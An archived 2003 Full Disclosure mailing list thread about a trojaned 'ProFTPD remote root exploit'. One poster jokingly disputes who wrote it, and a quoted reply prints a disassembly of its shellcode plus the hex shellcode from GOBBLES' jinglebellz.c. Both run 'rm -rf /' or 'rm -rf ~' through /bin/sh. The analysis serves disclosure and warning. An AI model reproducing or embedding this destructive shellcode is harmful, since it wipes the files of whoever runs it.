Full Disclosure mailing list archives
Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit)
From: mitch_hurrison () ziplip com
Date: Fri, 24 Oct 2003 16:15:18 -0700 (PDT)
Hi list, Hrmm. Ok I'm no Sherlock Holmes but even I could see through this 'analysis'. This is obviously an elaborate attempt to soil the reputations of the fine people, dare I say heros of information security, at GOBBLES security. Let's examine the case at hand: 1) Someone makes the effort of cutting up an existing public GOBBLES shellcode. An act that requires just as much effort as writing original opcode. 2) This cutup version is used in a 'trojan' even my grandmother would be able to spot. (Obscure in-exploit overflows are way more effective folks, ask HD "I pioneered screensavers" Moore). 3) Some random hero pops up on the list pointing out that 'hey, this is GOBBLES shellcode *WINK*' Now who, on God's green earth, would recognise shellcode from an obscure exploit that was published months ago. If they didn't have it fresh in memory? So I think it's rather obvious either zeroboy, or one of his friends is responsible for this trojan. And he has some sort of rancune towards GOBBLES. Either that or he has a serious hardon for memorising hex opcode buffers. With regards, Mitch
-----Original Message----- From: zero [mailto:zeroboy () arrakis es] Sent: Friday, October 24, 2003, 1:19 PM To: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] ProFTPD-1.2.9rc2 remote root exploit -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hmmm, let's see: Dump of assembler code for function shellcode: 0x08049480 <shellcode+0>: xor %eax,%eax 0x08049482 <shellcode+2>: push %eax 0x08049483 <shellcode+3>: push $0x582f2066 0x08049488 <shellcode+8>: push $0x722d206d 0x0804948d <shellcode+13>: push $0x7258632d 0x08049492 <shellcode+18>: push $0x41414141 0x08049497 <shellcode+23>: push $0x41414141 0x0804949c <shellcode+28>: push $0x41414141 0x080494a1 <shellcode+33>: push $0x41414141 0x080494a6 <shellcode+38>: push $0x4368732f 0x080494ab <shellcode+43>: push $0x6e69622f // /bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X 0x080494b0 <shellcode+48>: xor %eax,%eax 0x080494b2 <shellcode+50>: mov %al,0x7(%esp,1) 0x080494b6 <shellcode+54>: mov %al,0x1a(%esp,1) 0x080494ba <shellcode+58>: mov %al,0x23(%esp,1) 0x080494be <shellcode+62>: mov %esp,0x8(%esp,1) 0x080494c2 <shellcode+66>: xor %ebx,%ebx 0x080494c4 <shellcode+68>: lea 0x18(%esp,1),%ebx 0x080494c8 <shellcode+72>: mov %ebx,0xc(%esp,1) 0x080494cc <shellcode+76>: xor %ebx,%ebx 0x080494ce <shellcode+78>: lea 0x1b(%esp,1),%ebx 0x080494d2 <shellcode+82>: mov %ebx,0x10(%esp,1) 0x080494d6 <shellcode+86>: mov %eax,0x14(%esp,1) 0x080494da <shellcode+90>: xor %ebx,%ebx 0x080494dc <shellcode+92>: mov %esp,%ebx 0x080494de <shellcode+94>: lea 0x8(%esp,1),%ecx 0x080494e2 <shellcode+98>: xor %edx,%edx 0x080494e4 <shellcode+100>: lea 0x14(%esp,1),%edx 0x080494e8 <shellcode+104>: mov $0xb,%al 0x080494ea <shellcode+106>: int $0x80 0x080494ec <shellcode+108>: xor %ebx,%ebx 0x080494ee <shellcode+110>: xor %eax,%eax 0x080494f0 <shellcode+112>: inc %eax 0x080494f1 <shellcode+113>: int $0x80 0x080494f3 <shellcode+115>: add %al,(%eax) End of assembler dump. Let's give credits to the original c0d3rs of this shellcode. Nobody remembers jinglebellz.c? <snip> /* jinglebellz.c - local/remote exploit for mpg123 (c) 2003 GOBBLES Security seXForces [...] unsigned char linux_shellcode[] = /* contributed by antiNSA */ "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f" "\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43" "\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35" "\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72" "\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0" "\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66" "\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd" "\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd" "\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31" "\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58" "\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41" "\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69" "\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23" "\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31" "\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb" "\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd\x80"; </snip> Well well, just a nice copy paste of some of it? :pPpPpPppP And the exact cmd is: execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL}) NOTE: In this one ~ is change for a nicer one / Have a nice turkey. Cheerz www.citfi.org www.podergeek.com ********************************** "The further backward you look, the further forward you can see" Winston Churchill "Access is GOD..." -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> iQA/AwUBP5lx/Q0R8jZM93x8EQJCdwCg9HfcZVDSO8/JCA17lHdkkKT7nKEAn0C6 l9RpeQ2ZrufRkkV3dflO1dTB =kkQd -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit) mitch_hurrison (Oct 24)
- Re: Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit) Cael Abal (Oct 24)
- [Full-Disclosure] Re: Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit) zero (Oct 24)
- <Possible follow-ups>
- Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit) mitch_hurrison (Oct 24)
- Re: Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit) Cael Abal (Oct 25)
- Re: Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit) Jirka Kosina (Oct 26)
- Re: Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit) Ron DuFresne (Oct 27)